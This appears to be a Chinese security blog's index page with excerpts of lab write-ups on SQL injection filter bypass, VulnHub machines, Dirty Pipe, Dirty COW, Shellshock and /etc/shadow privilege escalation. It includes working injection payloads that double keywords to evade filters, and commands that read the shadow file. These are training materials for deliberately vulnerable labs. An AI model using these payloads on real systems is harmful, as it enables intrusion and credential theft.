类 CISP - PTE 模拟测试
类 CISP - PTE 模拟测试这靶机是在 N 年前做 Web 渗透培训时候的考核靶机,最近又有用到,那正好水一篇。 1 SQL Injection访问关卡界面如下: 一个非常明显的 SQL Injection 场景,输入任意数字后查询即可: 经过输入尝试,可以发现如下内容: 闭合类型:单引号 闭合符号:#/%23、-- /+ 过滤字符:and、or、union、select 绕过方式:双写 注入步骤如下所示: 1234567891011121314## 判断查询列数?id=1' oorrder by 1 %23 # 正常?id=1' oorrder by 2 %23 # 正常?id=1' oorrder by 3 %23 # 报错## 查看页面回显?id=-1' uniunionon selselectect 1,2 %23 # 1,2 均回显## 查看所有数据库名?id=-1' uniunionon selselectect 1,group_concat(schema_name) from infoorrmation_schema.schemata %23 # in...
Tomato
Tomato靶机地址:https://www.vulnhub.com/entry/tomato-1,557/ 1 信息收集 注:直接使用 VMware 导入 ova 即可。 首先查看 Kali IP 地址: 1234567891011121314root at kali in ~ $ ip --color address1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host noprefixroute valid_lft forever preferred_lft forever2: eth0: &...
Potato-Suncsr
Potato-Suncsr靶机地址:https://www.vulnhub.com/entry/potato-suncsr-1,556/ 1 信息收集 注:直接使用 VMware 导入 ova 即可。 首先查看 Kali IP 地址: 1234567891011121314root at kali in ~ $ ip --color address1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host noprefixroute valid_lft forever preferred_lft for...
Bob_v1.0.1
Bob_v1.0.1靶机地址:Bob_v1.0.1 1 信息收集 [!info] 原本拿到这台靶机时,用 VMware 打开获取不到 IP 地址。然后发现把 VM 更新到最新版就行了,很玄学。 首先查看 Kali IP 地址: 1234567891011121314root at kali in ~ $ ip --color address1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host noprefixroute valid_lft forever preferred_lft forever...
Linux Dirty Pipe 概述
Linux Dirty Pipe 概述1 Dirty Pipe 概述CVE-2022-0847-DirtyPipe-Exploit 存在于 Linux 内核 5.8 及之后版本中的本地提权漏洞。漏洞原理类似于 CVE-2016-5195 脏牛漏洞(Dirty Cow),但它更容易被利用,漏洞作者将此漏洞命名为 Dirty Pipe。 漏洞影响范围:5.8 <= Linux 内核版本 < 5.16.11 / 5.15.25 / 5.10.102 2 Dirty Pipe 复现这里使用 Ubuntu 20.04 作为测试环境,使用 Traitor 进行复现。 查看当前用户权限与内核: 1234yongz@ubuntu:/tmp$ iduid=1003(yongz) gid=1003(yongz) groups=1003(yongz)yongz@ubuntu:/tmp$ uname -aLinux ubuntu 5.8.0-41-generic #46~20.04.1-Ubuntu SMP Mon Jan 18 17:52:23 UTC 2021 x86_64 x86_64...
Linux Dirty COW 概述
Linux Dirty COW 概述1 Dirty COW 概述Dirty COW(Dirty Copy-on-Write)是一个计算机安全漏洞,也被称为 CVE-2016-5195。它于 2016 年首次公开,并且影响了许多基于 Linux 操作系统的设备和系统。 Dirty COW 漏洞存在于 Linux 内核的内存子系统中,具体影响了 Copy-on-Write(COW)机制。COW 是一种内存管理技术,在多个进程之间共享内存页面时使用。当一个进程试图修改共享页面时,操作系统会创建该页面的副本,以确保进程之间的数据隔离。然而,Dirty COW 漏洞允许恶意用户利用 COW 机制中的一个错误,以非法方式修改共享页面,绕过了操作系统的保护机制。 漏洞影响范围:Linux kernel 2.6.22以来的所有稳定版本:这包括2.6.22、2.6.32、3.x、4.x等版本。(2007 年发现,到 2016 年 10 月 18 日才修复) 并且 Android 也受影响。 Red Hat Enterprise Linux (RHEL) 5、6 和 7 的内核版本。 CentOS...
Linux 系统信息收集概述
Linux 系统信息收集概述1 Linux 手工枚举作为红队,拥有手动枚举的能力很重要,因为它为我们提供了关于目标系统上的信息以及潜在的提权途径的最好的和最深入的洞察。 1.1 我是谁?id:该命令显示当前用户的 UID(用户 ID)、GID(组 ID)以及所属的其他组的信息。它可以用于确定当前用户的身份和权限。 who:该命令显示当前登录的用户及相关信息,如登录时间、终端等。它可以用于查看当前系统上的用户会话。 whoami:该命令显示当前用户的用户名。它可用于快速确定当前会话所使用的用户名。 w:该命令提供关于当前登录用户的详细信息,包括他们在做什么以及系统的负载信息。它显示了每个登录用户的用户名、终端、登录时间、运行的命令和系统负载等。 last:该命令显示系统最近的登录记录。它列出了过去登录到系统的用户、登录时间、登录来源等信息。可以用于审计和跟踪用户登录活动。 1.2 我几岁?uname -a:该命令用于显示系统的相关信息,包括内核名称、主机名、内核发行版本、内核版本、硬件名称等。它提供了关于系统配置和内核的基本信息。 lsb_release -a:该命令用于显示 Li...
Linux shadow 文件提权
Linux shadow 文件提权1 shadow 提权说明对于一个正常的 /etc/shadow 文件来说,他的权限如下所示: 123root at kali in ~ $ ls -l /etc/shadow-rw-r----- 1 root shadow 1478 Nov 5 23:01 /etc/shadow 根据所学权限可以看出,/etc/shadow 默认是主要 root 用户可读可写,root 组可读: 123456root at kali in ~ $ su kali┌──(kali㉿kali)-[/root]└─$ cat /etc/shadowcat: /etc/shadow: Permission denied 切换到 Kali 用户可以发现,是没有查看权限的。 但是,假设运维人员突然抽了一下,将权限改为任意用户可读可写时,就会产生隐患: 1234567891011121314root at kali in ~ $ chmod o=rw /etc/shadowroot at kali in ~ $ ls -l /etc/shadow-rw-r--rw- ...
ShellShock(CVE-2014-6271)
ShellShock(CVE-2014-6271) 现在打靶都是 Docker 了,老人家也与时俱进一下,正好可以上课和学生演示使用,适当挖坑 QAQ。 1 漏洞说明 Shellshock 是一个严重的安全漏洞,影响了 Bash shell(命令行解释器)的版本。该漏洞于 2014 年 9 月被公开披露,引起了广泛的关注和忧虑。 Shellshock 漏洞的原因是 Bash 在处理环境变量时存在一个缺陷,使得攻击者可以通过在环境变量中注入恶意代码来执行任意命令。这种漏洞可能导致未经授权的访问、数据泄露、系统崩溃以及其他安全问题。 漏洞影响版本:GNU Bash <= 4.3 2 漏洞环境 运行漏洞环境: 12cd bash/CVE-2014-6271docker-compose up -d 3 漏洞复现3.1 漏洞环境 服务启动后,有两个页面: http://your-ip:8080/victim.cgi:使用 bash-4.3.0 的页面 http://your-ip:8080/safe.cgi:使用 bash-4.3.30 生成的页面 简单看一下这两个文件...
HackSudo-Aliens
Hacksudo-Aliens靶机地址:https://www.vulnhub.com/entry/hacksudo-aliens,676/ 1 信息收集 注:少见的一台可以使用 VMware Workstation 直接打开的靶机。 首先查看 Kali IP 地址: 1234567891011121314root at kali in ~/Desktop/hacksudo-aliens $ ip --color address1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host noprefixroute ...














